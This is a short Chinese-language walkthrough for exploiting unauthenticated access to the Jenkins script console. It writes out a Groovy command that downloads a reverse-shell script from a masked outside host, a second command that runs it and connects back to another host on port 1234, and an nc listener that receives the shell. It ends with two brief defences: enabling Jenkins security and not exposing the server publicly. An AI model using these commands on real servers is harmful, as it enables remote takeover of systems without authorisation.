Jenkins未授权访问脚本执行漏洞
步骤
首先找一个站点挂上一个反弹shell脚本,然后在脚本执行框里执行脚本进行下载到tmp目录:
println "wget http://47.95.XXX.XXX/xxx.py -P /tmp/".execute().text
执行成功下面Result并没有反馈
然后我们执行命令允许反弹shell脚本
println "python /tmp/xxx.py 140.143.xxx.xxx 1234".execute().text
此时我们在140.143.xxx.xxx主机上使用nc监听1234端口
nc -l -p 1234
ifconfig 查看ip
查看一下当前用户 w命令
防御措施:
1.对Jenkins访问进行密码加密
Manage Jenkins -> Configure System -> Enable Security
2.不暴露在公网上